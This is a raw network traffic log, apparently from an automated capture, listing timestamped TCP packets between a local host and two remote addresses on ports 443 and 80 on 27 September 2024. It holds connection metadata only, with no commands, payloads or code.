                                                                                    Sep 27, 2024 00:14:54.809990883 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.810009003 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.810091972 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.810107946 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.810152054 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.816210985 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816226006 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816329956 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816355944 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.816364050 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816410065 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.816451073 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.816672087 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816687107 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816736937 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.816744089 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.816785097 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817018986 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817035913 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817092896 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817096949 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817114115 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817127943 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817127943 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817137957 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817163944 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817193031 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817198992 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817224979 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:54.817240000 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817269087 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817575932 CEST49756443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:54.817589998 CEST443497565.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:55.086090088 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.086142063 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:55.086281061 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.086615086 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.086630106 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:55.766711950 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:55.766829967 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.767301083 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.767309904 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:55.769094944 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.769100904 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:55.769118071 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:55.769125938 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.292025089 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.292058945 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.292152882 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.292398930 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.292412996 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.906445026 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.906536102 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.906567097 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.906608105 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.907639980 CEST49757443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.907665014 CEST443497575.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.945166111 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.945373058 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.945899963 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.945908070 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:56.947753906 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:56.947760105 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:57.636827946 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:57.636850119 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:57.636931896 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.636931896 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.636938095 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:57.637037992 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.637312889 CEST49758443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.637332916 CEST443497585.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:57.639974117 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.639997005 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:57.640074968 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.640319109 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:57.640332937 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:58.287400961 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:58.287499905 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:58.287950993 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:58.287959099 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:58.290045977 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:58.290050983 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.014875889 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.014893055 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.014950037 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.014960051 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.014971018 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.015014887 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.015304089 CEST49759443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.015316010 CEST443497595.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.031595945 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.031616926 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.031691074 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.031915903 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.031925917 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.736471891 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.736675024 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.737603903 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.737616062 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:14:59.743323088 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:14:59.743330956 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:00.424401045 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:00.424490929 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:00.424516916 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:00.424560070 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:00.425389051 CEST49760443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:00.425407887 CEST443497605.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.086901903 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.086956978 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.087049007 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.087502956 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.087519884 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.765588999 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.765712976 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.766655922 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.766664982 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769108057 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769114971 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769248962 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769272089 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769287109 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769293070 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769378901 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769378901 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769390106 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769407034 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769421101 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769432068 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769515038 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769534111 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769577980 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769591093 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769634962 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769648075 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:01.769664049 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:01.769668102 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.004293919 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.004374027 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.004455090 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.004517078 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.068042994 CEST49762443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.068080902 CEST443497625.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.130908966 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.130944967 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.131094933 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.131347895 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.131361961 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.802233934 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.802303076 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.806386948 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.806399107 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:03.809221029 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:03.809237003 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:05.607445002 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:05.607495070 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:05.607511044 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:05.607528925 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:05.607558966 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:05.607580900 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:05.607882977 CEST49763443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:05.607894897 CEST443497635.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:05.613260031 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:05.621233940 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:05.621368885 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:05.621565104 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:05.626463890 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278753996 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278795958 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278829098 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278834105 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.278861046 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278868914 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.278881073 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.278894901 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278908014 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.278928041 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278942108 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.278961897 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.278976917 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.278994083 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.279007912 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.279027939 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.279036045 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.279057980 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.279083014 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.279103041 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.286652088 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.286746025 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.286830902 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.286885977 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.289026022 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.289083958 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.289596081 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.289659977 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375427008 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375457048 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375488043 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375519991 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375550985 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375551939 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375583887 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375617981 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375650883 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375682116 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375713110 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375720978 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375720978 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375720978 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375720978 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375720978 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375741959 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375746965 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375761986 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375785112 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375802040 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375817060 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375834942 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375868082 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.375937939 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375984907 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.375997066 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376019001 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.376044035 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376050949 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.376069069 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376084089 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.376106977 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376133919 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376672029 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.376703024 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.376724958 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376739979 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.376759052 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376791954 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.376988888 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.377043009 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.475620985 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475642920 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475657940 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475670099 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475683928 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475698948 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475712061 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475727081 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.475831985 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.475884914 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.476212025 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.476227045 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.476241112 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.476267099 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.476300955 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.476658106 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.476674080 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.476713896 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.476742029 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.476999998 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477056026 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.477138042 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477190971 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.477490902 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477504969 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477518082 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477545023 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.477574110 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.477891922 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477905989 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477920055 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477932930 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477943897 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.477948904 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.477979898 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.478013039 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.478790045 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.478812933 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.478827000 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.478833914 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.478842020 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.478848934 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.478867054 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.478904963 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.479497910 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.479512930 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.479526997 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.479559898 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.479584932 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.479631901 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.479646921 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.479686975 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.480551004 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.480566025 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.480580091 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.480628014 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.480653048 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.481164932 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.481177092 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.481226921 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.504067898 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.504249096 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.505002975 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.505074978 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567066908 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567082882 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567097902 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567152977 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567171097 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567178011 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567189932 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567205906 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567229986 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567250967 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567261934 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567266941 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567292929 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567332029 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567858934 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567873001 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567888021 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567903996 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567914963 CEST4976480192.168.2.4147.45.44.104
                                                                                    Sep 27, 2024 00:15:06.567919016 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567945004 CEST8049764147.45.44.104192.168.2.4
                                                                                    Sep 27, 2024 00:15:06.567950010 CEST4976480192.168.2.4147.45.44.104
